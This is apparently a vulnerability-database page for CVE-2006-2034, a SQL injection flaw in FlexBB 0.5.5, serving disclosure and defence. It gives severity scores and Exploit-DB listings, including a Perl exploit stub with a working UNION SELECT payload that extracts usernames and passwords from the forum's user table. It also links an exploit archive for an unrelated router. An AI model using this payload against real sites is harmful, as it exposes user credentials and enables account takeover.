CVE-2006-2034
published 2006-04-26CVE-2006-2034: SQL injection vulnerability in function/showprofile.php in FlexBB 0.5.5 allows remote attackers to execute arbitrary SQL commands, and view all usernames and…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.31%
81.2th percentile
SQL injection vulnerability in function/showprofile.php in FlexBB 0.5.5 allows remote attackers to execute arbitrary SQL commands, and view all usernames and passwords, via the id parameter to the showprofile page in index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexbb | flexbb | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities
exploitdb·2006-07-18
CVE-2006-3561 BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities
BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities
---
BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2034.tgz (07182006-btvoyager.tgz)
# milw0rm.com [2006-07-18]
Exploit-DB
FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection
exploitdb·2006-04-24
CVE-2006-2034 FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection
FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection
---
#!/usr/bin/perl
use IO::Socket;
#FlexBB Exploit [ function/showprofile.php ] Remote SQL Injection
#
# 1- First Do Login
# 2- View This Link :D
#
# index.php?page=showprofile&id=-1' UNION ALL SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8 FROM flexbb_users WHERE id=1/*
#
#-----------------------------------------------#
#
#--[ D3vil-0x1 | Devil-00 ]--#
#
# SecurityGurus.net
# Div The PHP Security Fucking Tool :D
##-- Start --#
$host = "127.0.0.1";
$path = "/flexbb/";
$injec = "-1'%20UNION%20ALL%20SELECT%201,username,3,4,5,6,7,8,9,0,1,2,3,password,5,6,7,8,9,0,1,2,3,4,3,4,5,7,8%20FROM%20flexbb_users%20WHERE%20id=1/*";
##-- _END_ --##
# $host :-
# The Host Name Without http:// | exm. www.vic.com
No writeups or analysis indexed.
2006-04-26
Published